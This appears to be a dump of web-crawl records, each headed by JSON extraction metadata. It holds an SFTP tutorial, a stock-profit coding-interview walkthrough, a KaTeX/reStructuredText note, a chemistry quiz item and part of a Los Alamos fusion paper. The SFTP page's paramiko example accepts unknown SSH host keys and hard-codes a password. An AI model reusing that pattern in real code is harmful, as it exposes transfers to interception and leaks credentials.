{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9968003630638123, "perplexity": 12743.418939985859}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-50/segments/1480698541556.70/warc/CC-MAIN-20161202170901-00086-ip-10-31-129-80.ec2.internal.warc.gz"}
https://code.adonline.id.au/sftp-via-the-command-line/
# SFTP via the Command Line

If you have a large quantity of files that you want to transfer from one server to another, the File Transfer Protocol (FTP) is the way to go. A secure variant, SFTP, runs the transfer over SSH (Secure Shell), so the data is encrypted in transit. Traditionally, uploads and downloads via FTP would be conducted using a GUI program such as WinSCP or FileZilla, but it is also possible to transfer files using SFTP on the command line. Here's how it's done:

## Connect to the server

To connect to a remote SFTP server, establish a secure SSH connection and then create an SFTP session as shown:

$ sftp [email protected]

To check the remote working directory, enter the pwd command:

sftp> pwd
Remote working directory: /group/home/adam/

To check the local working directory, type the lpwd command:

sftp> lpwd
Local working directory: t:\files\photos

Before uploading whole directories, you'll need to create a target directory on the remote server. Let's call this "photos":

sftp> mkdir photos

If you don't want to create a directory in the current path (as determined by pwd), cd to the location where you want to create your new directory:

sftp> cd /group/home/adam/path/to/my/files/
sftp> mkdir photos

To start the upload, your local working directory will need to be the parent. So in this case, if we want to upload the entire directory t:\files\photos, then our local working directory should be t:\files. We can easily change this via the lcd command and then check it via lpwd:

sftp> lcd t:\files
sftp> lpwd
Local working directory: t:\files

To upload, the put command is used:

sftp> put -pr photos

The -p flag preserves all modification times, access times, and modes from the original files transferred, whilst the -r flag allows subdirectories and subfolders to be uploaded. Typical output may look like this:

sftp> put -pr photos
Entering photos/
photos/IMG_1507.jpg 100% 10MB 265.1KB/s 00:39
photos/IMG_1507.xmp 100% 8703 21.3KB/s 00:00
photos/IMG_1511.jpg 100% 10MB 265.5KB/s 00:37
photos/IMG_1511.xmp 100% 8702 50.0KB/s 00:00
Entering photos/pix
photos/pix/IMG_1507.CR2 100% 25MB 223.0KB/s 01:56
photos/pix/IMG_1511.CR2 100% 25MB 188.9KB/s 02:16

To download files from a Linux server via the command line, you'll need to change the remote working directory to the parent. So, if I wanted to download files from /group/home/adam/photos, I'd need to cd to /group/home/adam:

sftp> cd /group/home/adam/

The target location on the local server also needs to be specified and must already exist. If it does not exist, it can be created in the command line as follows:

sftp> lmkdir photos

The get command can then be used to download the files:

sftp> get -r photos

Typical output:

sftp> get -r photos
/group/home/adam/photos/pix/IMG_1511.xmp 100% 8702 39.4KB/s 00:00

## Exiting the Shell

To exit, type exit into the command line.
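If the same transfer needs to be scripted rather than typed interactively, here is a rough sketch using the third-party Python library paramiko. This is an addition, not something the article covers; the hostname, credentials and paths are placeholders, and unlike put -pr these calls do not recurse into subdirectories.

import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("example.com", username="adam", password="secret")   # placeholders

sftp = client.open_sftp()
sftp.chdir("/group/home/adam")            # like cd
print(sftp.getcwd())                      # like pwd
try:
    sftp.mkdir("photos")                  # like mkdir (raises if it already exists)
except IOError:
    pass

# put()/get() move one file at a time; recursing into subdirectories is up to you
sftp.put("t:/files/photos/IMG_1507.jpg", "/group/home/adam/photos/IMG_1507.jpg")
sftp.get("/group/home/adam/photos/IMG_1507.jpg", "t:/files/photos/IMG_1507_copy.jpg")

sftp.close()
client.close()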
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4280011057853699, "perplexity": 11084.068475826212}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057622.15/warc/CC-MAIN-20210925112158-20210925142158-00207.warc.gz"}
https://www.interviewcake.com/
# I will teach you to be good at programming interviews

The coding interview is a winnable game. I'll show you the tricks to quickly solve problems you've never seen before.

## Sample Programming Interview Question

Writing coding interview questions hasn't made me rich. Maybe trading Apple stocks will. I have an array stock_prices_yesterday where:

• The indices are the time in minutes past trade opening time, which was 9:30am local time.
• The values are the price in dollars of Apple stock at that time.

For example, the stock cost $500 at 10:30am, so stock_prices_yesterday[60] = 500.

Write an efficient algorithm for computing the best profit I could have made from 1 purchase and 1 sale of 1 Apple stock yesterday. No "shorting"—you must buy before you sell. You may not buy and sell in the same time step (at least 1 minute must pass).

It is not sufficient to simply take the difference between the highest price and the lowest price, because the highest price may come before the lowest price. You must buy before you sell.

What if the stock value goes down all day? In that case, the best profit will be negative.

You can do this in O(n) time and O(1) space!

The brute force approach would be to try every pair of times (treating the earlier time as the buy time and the later time as the sell time) and see which one is higher.

    def get_max_profit(stock_prices_yesterday):
        max_profit = 0

        # go through every time
        for outer_time in xrange(len(stock_prices_yesterday)):

            # for every time, go through every OTHER time
            for inner_time in xrange(len(stock_prices_yesterday)):

                # for each pair, find the earlier and later times
                earlier_time = min(outer_time, inner_time)
                later_time = max(outer_time, inner_time)

                # and use those to find the earlier and later prices
                earlier_price = stock_prices_yesterday[earlier_time]
                later_price = stock_prices_yesterday[later_time]

                # see what our profit would be if we bought at the
                # earlier price and sold at the later price
                potential_profit = later_price - earlier_price

                # update max_profit if we can do better
                max_profit = max(max_profit, potential_profit)

        return max_profit

But that will take O(n²) time, since we have two nested loops—for every time, we're going through every other time. Can we do better?

Well, we're doing a lot of extra work. We're looking at every pair twice. We know we have to buy before we sell, so in our inner for loop we could just look at every price after the price in our outer for loop. That could look like this:

    def get_max_profit(stock_prices_yesterday):
        max_profit = 0

        # go through every price (with its index as the time)
        for earlier_time, earlier_price in enumerate(stock_prices_yesterday):

            # and go through all the LATER prices
            for later_price in stock_prices_yesterday[earlier_time:]:

                # see what our profit would be if we bought at the
                # earlier price and sold at the later price
                potential_profit = later_price - earlier_price

                # update max_profit if we can do better
                max_profit = max(max_profit, potential_profit)

        return max_profit

What's our runtime now? Well, our outer for loop goes through all the times and prices, but our inner for loop goes through one fewer price each time. So our total number of steps is the sum n + (n - 1) + (n - 2) ... + 2 + 1, which is still O(n²) time.

We can do better! If we're going to do better than O(n²), we're probably going to do it in either O(n lg n) or O(n). O(n lg n) comes up in sorting and searching algorithms where we're recursively cutting the set in half. It's not obvious that we can save time by cutting the set in half here.
Let's first see how well we can do by looping through the set only once. Since we're trying to loop through the set once, let's use a greedy approach, where we keep a running max_profit until we reach the end. We'll start our max_profit at $0. As we're iterating, how do we know if we've found a new max_profit?

At each iteration, our max_profit is either:

1. the same as the max_profit at the last time step, or
2. the max profit we can get by selling at the current_price

How do we know when we have case (2)? The max profit we can get by selling at the current_price is simply the difference between the current_price and the min_price from earlier in the day. If this difference is greater than the current max_profit, we have a new max_profit.

So for every price, we'll need to:

• keep track of the lowest price we've seen so far
• see if we can get a better profit

Here's one possible solution:

    def get_max_profit(stock_prices_yesterday):
        min_price = stock_prices_yesterday[0]
        max_profit = 0

        for current_price in stock_prices_yesterday:

            # ensure min_price is the lowest price we've seen so far
            min_price = min(min_price, current_price)

            # see what our profit would be if we bought at the
            # min price and sold at the current price
            potential_profit = current_price - min_price

            # update max_profit if we can do better
            max_profit = max(max_profit, potential_profit)

        return max_profit

We're finding the max profit with one pass and constant space! Are we done? Let's think about some edge cases. What if the stock value stays the same? What if the stock value goes down all day?

If the stock price doesn't change, the max possible profit is 0. Our function will correctly return that. So we're good. But if the value goes down all day, we're in trouble. Our function would return 0, but there's no way we could break even if the price always goes down.

How can we handle this? Well, what are our options? Leaving our function as it is and just returning zero is not a reasonable option—we wouldn't know if our best profit was negative or actually zero, so we'd be losing information. Two reasonable options could be:

1. return a negative profit. "What's the least badly we could have done?"
2. throw an error. "We should not have purchased stocks yesterday!"

In this case, it's probably best to go with option (1). The advantages of returning a negative profit are:

• We more accurately answer the challenge. If profit is "revenue minus expenses", we're returning the best we could have done.
• It's less opinionated. We'll leave decisions up to our function's users. It would be easy to wrap our function in a helper function to decide if it's worth making a purchase.
• We allow ourselves to collect better data. It matters if we would have lost money, and it matters how much we would have lost. If we're trying to get rich, we'll probably care about those numbers.

How can we adjust our function to return a negative profit if we can only lose money? Initializing max_profit to 0 won't work...

Well, we started our min_price at the first price, so let's start our max_profit at the first profit we could get—if we buy at the first time and sell at the second time.

    min_price = stock_prices_yesterday[0]
    max_profit = stock_prices_yesterday[1] - stock_prices_yesterday[0]

But we have the potential for an index out of bounds error here, if stock_prices_yesterday has fewer than 2 prices. We do want to throw an error in that case, since profit requires buying and selling, which we can't do with less than 2 prices.
So rather than throwing a confusing index out of bounds error, let's explicitly catch that case and throw a more helpful error message:

    if len(stock_prices_yesterday) < 2:
        raise IndexError('Getting a profit requires at least 2 prices')

    min_price = stock_prices_yesterday[0]
    max_profit = stock_prices_yesterday[1] - stock_prices_yesterday[0]

    # etc...

Ok, does that work? No! max_profit is still always 0! What's happening?

If the price always goes down, min_price is always set to the current_price. So current_price - min_price comes out to 0, which of course will always be greater than a negative profit. When we're calculating the max_profit, we need to make sure we never have a case where we try both buying and selling stocks at the current_price.

To make sure we're always buying at an earlier price, never the current_price, let's switch the order around so we calculate max_profit before we update min_price. We'll also need to pay special attention to time 0. Make sure we don't try to buy and sell at time 0!

We'll greedily walk through the array to track the max profit and lowest price so far. For every price, we check if:

• we can get a better profit by buying at min_price and selling at the current_price
• we have a new min_price

To start, we initialize:

1. min_price as the first price of the day
2. max_profit as the first profit we could get

We decided to return a negative profit if the price decreases all day and we can't make any money. We could have thrown an error instead, but returning the negative profit is cleaner, makes our function less opinionated, and ensures we don't lose information.

    def get_max_profit(stock_prices_yesterday):

        # make sure we have at least 2 prices
        if len(stock_prices_yesterday) < 2:
            raise IndexError('Getting a profit requires at least 2 prices')

        # we'll greedily update min_price and max_profit, so we initialize
        # them to the first price and the first possible profit
        min_price = stock_prices_yesterday[0]
        max_profit = stock_prices_yesterday[1] - stock_prices_yesterday[0]

        for index, current_price in enumerate(stock_prices_yesterday):

            # skip the first (0th) time
            # we can't sell at the first time, since we must buy first,
            # and we can't buy and sell at the same time!
            # if we took this out, we'd try to buy /and/ sell at time 0.
            # this would give a profit of 0, which is a problem if our
            # max_profit is supposed to be /negative/--we'd return 0!
            if index == 0:
                continue

            # see what our profit would be if we bought at the
            # min price and sold at the current price
            potential_profit = current_price - min_price

            # update max_profit if we can do better
            max_profit = max(max_profit, potential_profit)

            # update min_price so it's always
            # the lowest price we've seen so far
            min_price = min(min_price, current_price)

        return max_profit

This is O(n) time and O(1) space. We only loop through the array once.

We have plenty more practice programming interview questions. Some easy, some hard. If you're ready to get really freaking good at coding interviews, get started now.
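As a quick sanity check (not part of the original article), here is a hypothetical call to the final get_max_profit above, using made-up price arrays:

```python
# Hypothetical usage of the final get_max_profit() above, with made-up prices.
prices = [10, 7, 5, 8, 11, 9]
print(get_max_profit(prices))    # 6: buy at 5, sell at 11

falling = [10, 9, 7, 4]
print(get_max_profit(falling))   # -1: the least bad trade (buy at 10, sell at 9)
```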
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.42677634954452515, "perplexity": 2119.0322351862355}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-27/segments/1435375097512.42/warc/CC-MAIN-20150627031817-00160-ip-10-179-60-89.ec2.internal.warc.gz"}
https://weiler.rocks/using-katex-in-hugo-with-restructuredtext/
# Using KaTeX with reStructuredText

Published: 06.01.2020 | 216 Words | 2 minutes
Tags: [ katex restructuredtext latex ]

## Problem:

On posts that use the .rst format, the KaTeX rendering was broken. For example, the LaTeX equation "\forall x,y \in \mathbb{N}" should be rendered as

$$\forall x,y \in \mathbb{N}$$

but instead there was

$$forall x, y in mathbb{N}$$

The issue lies in the processing of the .rst file: because "\" is the escape character in reStructuredText, all "\" are stripped from the HTML output.

## Solution:

You could simply escape each "\" with another "\", so that the equation looks like "\\forall x,y \\in \\mathbb{N}". This works for small formulas, but it is not ideal, because every backslash now has to be doubled.

The more convenient solution is to use a directive named "raw". With ".. raw:: html" the reStructuredText parser will pass a section of the content through untouched, so that KaTeX can do the rendering. It can be used like this:

    Some content above.

    .. raw:: html

       $$\forall x,y \in \mathbb{N}$$

    Normal content below the ignored section.

The blank lines around ".. raw:: html" are important, as is the indentation!
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7854017615318298, "perplexity": 7022.175461483903}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710417.25/warc/CC-MAIN-20221127173917-20221127203917-00365.warc.gz"}
http://clay6.com/qa/24338/cracking-of-rubber-is-due-to
Cracking of rubber is due to

$\begin{array}{1 1}(a)\;Smog\\(b)\;Acid\;rain\\(c)\;Green\;house\;effect\\(d)\;High\;temperature\end{array}$

Cracking of rubber is due to smog. Hence (a) is the correct answer.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9912134408950806, "perplexity": 4122.938193670156}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00453-ip-10-171-10-70.ec2.internal.warc.gz"}
https://fusionenergy.lanl.gov/Documents/MTF/Why_MTF/Why-MTF-Comments.html
Why Magnetized Target Fusion Offers A Low-Cost Development Path for Fusion Energy Richard E. Siemon Irvin R. Lindemuth Kurt F. Schoenberg Los Alamos National Laboratory Los Alamos, New Mexico Submitted to Comments on Plasma Physics and Controlled Fusion, November 12, 1997 I. Introduction Reasonably priced energy supplies have become an expectation of the developed world and a necessary ingredient for development of Third World countries. The problem of providing large supplies of low-cost energy is a long-term, complex one that requires sustained R&D efforts, in spite of the shadow cast on long-term R&D by the federal deficit problem. The role of fusion energy as a power source was thoroughly reviewed and strongly endorsed in 1995 by the President’s Committee of Advisors on Science and Technology Fusion Review Panel chaired by John Holdren. He argued [Holdren 95]: The options available for meeting the world’s demand for energy in 2050 and beyond are those already in use – fossil fuels, biomass energy, nuclear fission, hydropower, geothermal energy, wind energy, and solar energy – plus, potentially, nuclear fusion. In these circumstances, it should be obvious that there is great merit in the pursuit of diversity in energy options for the next century. There are not so many possibilities altogether. The greater the number of these that can be brought to the point of commercialization, the greater will be the chance that overall energy needs can be met without encountering excessive costs from or unmanageable burdens upon any one source. In the past decade the critical issue for fusion has shifted from one of scientific feasibility to one of commercial viability. The specific problem is that all fusion technologies currently being pursued involve extremely costly facilities for the required steps of further development. In the present international fiscal environment, it is imperative to find a more cost effective development path for fusion energy. The conventional regime of Magnetic Fusion Energy (MFE), with plasma density n ~ 1014 cm-3 and magnetic field provided by superconducting magnets, has been relatively well explored [Sheffield 96]. Tokamaks are the major devices studied in MFE, and tokamak research has tremendously advanced our understanding of plasma physics. The International Tokamak Experimental Reactor (ITER) design illustrates the technology and cost for an ignited plasma demonstration in the MFE regime. The estimated \$10-billion price for ITER calls into question whether fusion can ever be developed based on tokamak-like technology. Factors of a few, or maybe ten at most, in any parameter such as size, neutron wall loading, and so forth are about all that one can credibly seek in optimizing a tokamak system. Certainly research seeking to reduce the ITER-like system size by factors of a few is extremely important and needs to be pursued. But we strongly suspect that the necessary breakthrough, which would allow fusion to be developed in a more timely and affordable manner, will involve a qualitatively different and significant departure from the MFE tokamak regime and technology. Another approach to fusion, Inertial Confinement Fusion (ICF), represents a good alternative to MFE in that the regime of density and pressure is completely different, the physics issues are quite distinct, and the technology required has fairly little in common with a tokamak-like system [Lindl 95]. 
Thus, the issues that are likely to emerge as limitations for one approach are unlikely to apply to the other. Unfortunately, the cost of developing ICF is also high. The price of the National Ignition Facility (NIF), which will demonstrate ICF ignition, is over \$1 billion. The anticipated cost of developing efficient inertial fusion drivers such as heavy ion beams is also high [Bangerter 97]. For the development of fusion energy, something less expensive would obviously be desirable. A Lower Cost Alternative—Magnetized Target Fusion To find a lower cost approach, we start by noting that the cost of development is directly linked to the system size, which in the case of MFE is mostly dictated by the maximum magnetic field strength obtainable with superconducting magnets. The critical constraint with ICF is the costly high-power drivers needed to achieve the extreme conditions of density and pressure. We also note that countless examples can be found in the magnetic fusion literature showing that fusion reactions can be created in smaller-sized systems if one admits larger magnetic field, higher plasma density, and pulsed operation as with imploding liners [Sherwood 81, Lindemuth 83, Robson 76, Vekshtein 90, Ryutov 96, Gross 76]. In this paper we will review the basic reason for that tendency, and examine some of the consequences. We will conclude that the most interesting regime of density is n ~1020 cm-3, which is high compared with MFE, but low compared with ICF. This density regime at 10 keV temperature corresponds to megabars of pressure (millions of atmospheres), which is intrinsically pulsed in nature. We define the intermediate density regime to be Magnetized Target Fusion (MTF). The name is chosen based on two general characteristics that we assume for MTF: 1) as with ICF, PdV work heats the fuel by compressing it inside an imploding wall, or "pusher" in the parlance of ICF, and 2) magnetic field is embedded in the fuel to insulate it from the pusher. Although numerous variations in approach can be envisioned, we have in mind the magnetically-driven imploding liner method for MTF. In the liner approach: • fuel with an embedded magnetic field would be preheated and positioned inside a volume of centimeter dimensions, which is surrounded by a thin metal shell (or liner) that will act as the pusher, • a current introduced on the outer surface of the liner would cause it to implode by self-pinching magnetic forces at a velocity of approximately 106 cm/sec, • the liner would be made thick enough that the pinching current does not vaporize it, and therefore the liner would be a flux-conserving metal shell during the implosion, • at peak compression a significant fraction of the liner kinetic energy would be converted to thermal energy of the fuel, and • the dwell time of the liner at peak compression and the final fuel density and temperature would be designed to give significant fusion energy generation. The liner velocity required is termed hypervelocity because the kinetic energy density exceeds the heat of vaporization for liner materials. The technology for precision implosions creating millions of atmospheres of pressure is a challenge in its own right. In the 1970s when a number of MTF-related efforts were underway, most of the effort was directed towards developing this demanding technology, and very few integrated tests with a preheated plasma were ever done. 
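To put a number on the hypervelocity criterion just mentioned, here is a minimal sketch (not from the paper) comparing the specific kinetic energy of a liner at the quoted ~10^6 cm/sec with the heat of vaporization of two candidate liner metals; the material values are approximate handbook numbers and are my assumption, not figures given by the authors.

```python
# Specific kinetic energy of a liner moving at ~1e6 cm/s, compared with the
# heat of vaporization of two candidate liner metals. The velocity comes from
# the text; the material values are approximate handbook numbers (assumed).
v_cm_s = 1.0e6                   # liner velocity from the text, cm/s
v_m_s = v_cm_s * 1.0e-2          # = 1e4 m/s (10 km/s)

ke_kj_per_g = 0.5 * v_m_s**2 / 1.0e6   # J/kg converted to kJ/g

heat_vap_kj_per_g = {"aluminium": 10.9, "copper": 4.7}   # approximate values

print("kinetic energy density ~ %.0f kJ/g" % ke_kj_per_g)   # ~50 kJ/g
for metal, h in heat_vap_kj_per_g.items():
    print("%s: heat of vaporization ~ %.1f kJ/g -> exceeded: %s"
          % (metal, h, ke_kj_per_g > h))
```

At 10 km/s the kinetic energy density comfortably exceeds the heat of vaporization of common liner metals, which is the sense in which the implosion is "hypervelocity."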
In what must be viewed as a serendipitous coincidence, the Department of Energy's Office of Defense Programs (DP) in the last decade has significantly advanced the technology of imploding liners with the same parameters of implosion velocity and kinetic energy as those needed for investigating fusion reactions in the MTF regime. The purpose of the Defense Program work is to study and understand hydrodynamics in the megabar pressure regime and has no connection with nuclear fusion. However, the existence of DP expertise and facilities offers an important near-term advantage for resuming MTF research.

The magnetic field to insulate fuel from its surroundings is the essential ingredient of MTF. In fact, the benefit of a magnetic field in a fusion target was recognized in the 1940s by Fermi at Los Alamos and at approximately the same time by Sakharov in the former Soviet Union. We will derive below the advantages in terms of reduced energy and power that must be delivered to the fusion fuel.

The advantages of MTF can also be expressed in terms of requirements on driver technology. By preheating MTF fuel to between 100 and 500 eV, the volume compression needed to reach 10 keV temperature is 100-1000. The volume compression ratios for ICF are typically 30,000 to 60,000, which requires a much more precise implosion system. The characteristic implosion velocity for MTF is 0.3-3.0 cm per microsecond, which is 10 to 100 times smaller than for ICF. The peak pressure for MTF is 1-10 megabars, and for ICF, 100s of gigabars. These impressive differences justify careful examination of ways to introduce a magnetic field.

II. The Technical Case for Magnetized Target Fusion

A. Lawson Condition for Pulse Duration and Energy Confinement Time

In a pulsed system, as opposed to steady state, the pulse duration, τ_burn, is an important new variable. The pulse duration determines the amount of fuel that reacts or "burns," given the reaction cross section, leading to an nτ_burn requirement in a similar way that nτ_E is determined from power balance in a steady-state system. For deuterium-tritium (DT) fuel the thermonuclear reaction rate per unit volume is

R = n_D n_T <σ_DT v> = (1/4) n² <σ_DT v>     (1)

where n_D = n_T is the deuterium and tritium density, n = n_D + n_T is the total ion or electron density, and <σ_DT v> is the averaged product of cross section and relative velocity for a Maxwellian velocity distribution. At 10 keV, <σ_DT v> ≈ 10^-16 cm^3/sec. The total density decreases at the rate 2R as the fuel is consumed, and the frequency of fusion reactions per ion for either deuterium or tritium ions is given by 2R/n:

(dn_D/dt)/n_D = (dn/dt)/n = (1/2) n <σ_DT v>     (2)

Assuming for simplicity that DT fuel is held at constant temperature so that <σ_DT v> is constant in time while it burns, Eqn. 2 can be integrated to give

n/n_0 = 1/(1 + n_0 τ_burn <σ_DT v>/2)     (3)

where τ_burn is the burn time. Equation 3 can be recast in terms of f, the fractional burnup of fuel, as

f/(1 - f) = n_0 τ_burn <σ_DT v>/2     (4)

where f ≡ 1 - n/n_0. For complete burnup, the gain would be G_max = 300 at 10 keV. This is simply the ratio of the energy of a 14.1 MeV neutron and a 3.5 MeV alpha divided by the 60 keV of thermal energy for a DT ion pair with electrons.

Figure 1. Fusion energy output relative to plasma energy vs. the product of density and burn time.

As a function of burn time, the gain plotted in Fig. 1 is G_max times the fractional burnup. We can define a Lawson condition using Fig. 1.
With nτ_burn ~ 3×10^14 cm^-3 sec the gain relative to thermal energy is around five, enough to allow for net gain with realistic efficiencies. The net gain relative to initially stored electrical energy is the gain of Fig. 1 times the efficiency of heating fuel to 10 keV temperature. For example, if 50% of the stored electrical energy is converted to liner kinetic energy [Gerwin 78], and 50% of the liner kinetic energy is converted to thermal plasma energy at peak compression, then the net gain would be 1/4 of the gain plotted in Fig. 1.

A plasma heated to 10 keV will cool by numerous mechanisms. The total power losses per unit volume are conventionally written as 3nT/τ_E, where τ_E is the global energy confinement time. In deriving Fig. 1 we ignored losses, which is equivalent to assuming τ_E >> τ_burn. To obtain the minimum possible system size for the purpose of low-cost development, we would require τ_E ~ τ_burn. That is, if τ_E were much less than τ_burn the fuel would cool before it burned. On the other hand, if τ_E were much larger than τ_burn, the plasma should be made smaller to equalize the two, which requires less energy, assuming the energy confinement time increases with system size. For approximate estimates, the relevant energy confinement time and the burn time should both satisfy a Lawson-like nτ, which we will take for the purposes of demonstrating feasibility to be the same as ITER, and approximately an energy breakeven condition according to Figure 1:

Lawson requirement: nτ ~ nτ_E ~ nτ_burn ~ 3×10^14 cm^-3 sec

This nτ_E corresponds to a 1.5% burnup fraction in a pulsed system.

B. Pressure of High-Density Fuel Dictates Pulsed Technology

The first requirement for containing fuel is equilibrium or pressure balance to prevent the fuel from expanding during the required burn time. There is a continuum of possibilities ranging from ICF with zero magnetic field, where pressure is supported by the inertia of surrounding low-temperature fuel, to full magnetic confinement, where plasma pressure is less than or equal to the confining magnetic pressure. In the MTF regime we consider the possibility where plasma pressure is larger than or equal to the magnetic field pressure, because the main role of the magnetic field is insulation and not confinement.

Broadly speaking, the relevant technology changes as the density increases. We assume T_i ~ T_e ~ 10 keV. At densities from 10^14 cm^-3 up to about 10^16 cm^-3, plasma pressure can be contained by superconducting magnets, where the higher density corresponds to magnetic confinement with β = 1. Plasma β ≡ 2nkT/(B²/8π), where B is the magnetic field. At pressure or density too high for superconductors, pulsed magnets can be used up to pressures that fracture known materials. Strength limitations set an upper limit on the density at about 10^18 cm^-3. This density corresponds to a magnetic field of about 1 MG if magnetic pressure confines the plasma. To date, the largest magnetic fields reported are pulsed fields of about 20 MG, which can be obtained by imploding liners [Pavlovskii 96]. If 20 MG were used for plasma confinement, the corresponding maximum density is around 10^21 cm^-3. Above that density, plasma pressure must be held by the inertia of material walls, although magnetic field can be utilized for its insulating properties. For ICF the density of the ignited hot spot is expected to be about 10^25 cm^-3, which corresponds to a pressure of 200 Gbar. We see that the technology for fusion changes radically as one moves from MFE density to ICF density.
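As a quick numerical cross-check of Eqns. 3-4 and the gain curve of Fig. 1, here is a minimal sketch (not part of the paper) that uses only the values quoted above: <σ_DT v> ≈ 10^-16 cm^3/sec at 10 keV, G_max ≈ 300, and nτ_burn ≈ 3×10^14 cm^-3 sec.

```python
# Rough check of the Lawson numbers quoted above (values taken from the text:
# <sigma*v> ~ 1e-16 cm^3/s at 10 keV, G_max ~ 300, n*tau_burn ~ 3e14 s/cm^3).
sigma_v = 1.0e-16   # cm^3/s, DT reactivity at 10 keV
n_tau = 3.0e14      # cm^-3 * s, Lawson-like requirement
G_max = 300.0       # gain for complete burnup at 10 keV

x = n_tau * sigma_v / 2.0      # right-hand side of Eqn. 4
f = x / (1.0 + x)              # fractional burnup, from f/(1-f) = x
gain = G_max * f               # gain plotted in Fig. 1

print("fractional burnup f = %.3f" % f)   # ~0.015, the 1.5% quoted above
print("gain = %.1f" % gain)               # ~4.4, i.e. "around five"
```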
C. Fusion Fuel Diffuses Before Burning

Another basic point useful to recall for the following discussion is that σ_DT, the cross section for fusion, is much smaller than σ_C, the cross section for Coulomb scattering, almost independent of density. By definition the frequency of collisions is given by the product of cross section and flux. The frequency of fusion reactions per ion is given by the right-hand side of Eqn. 2:

Frequency of fusion reactions = (1/2) n <σ_DT v>     (5)

The effective fusion cross section can be taken as <σ_DT v>/v_i ~ 1 barn (10^-24 cm^2) at 10 keV, where v_i is the ion thermal speed. Similarly, the Coulomb collision frequency can be written as a product of the Coulomb cross section and particle flux, n multiplied by v_i:

Ion-ion Coulomb collision frequency = ν_ii = 1/τ_ii = n v_i σ_C     (6)

